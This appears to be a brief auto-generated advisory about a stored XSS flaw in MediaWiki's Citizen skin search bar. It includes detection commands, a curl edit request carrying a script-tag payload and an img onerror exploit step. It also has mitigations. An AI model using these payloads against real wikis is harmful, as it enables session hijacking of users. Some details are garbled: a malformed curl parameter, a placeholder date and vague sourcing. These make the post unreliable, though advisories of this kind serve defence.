Listen to this Post
How the CVE Works
The vulnerability occurs in the Citizen skin for MediaWiki when page descriptions are inserted into raw HTML without proper sanitization. This affects the old search bar functionality, allowing unsanitized user input to be rendered as HTML. Attackers can inject malicious scripts via page edits, which execute when other users search for the affected pages. The issue stems from improper handling of descriptions in TypeaheadListItem.mustache, where user-supplied content is directly embedded into the DOM without escaping.
DailyCVE Form
Platform: MediaWiki
Version: Citizen skin (pre-patch)
Vulnerability: Stored XSS
Severity: Critical
Date: 2023-XX-XX
Prediction: Patch expected Q4 2023
What Undercode Say
Check if Citizen skin is installed grep -r "Citizen" /var/www/html/skins/ Verify search gateway setting cat LocalSettings.php | grep "wgCitizenSearchGateway" Test XSS payload curl -X POST "http://wiki.example.com/api.php" --data "action=edit&=TestXSS&text=<script>alert(1)</script>"
How Exploit
- Edit a wiki page with
<img src="" onerror="alert('XSS')">.
2. Disable command palette via `$wgCitizenEnableCommandPalette = false;`.
3. Search for the page—payload executes.
Protection from this CVE
- Update Citizen skin.
- Enable HTML sanitization.
- Use CSP headers.
Impact
- Arbitrary JS execution.
- Session hijacking.
- Privilege escalation.
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
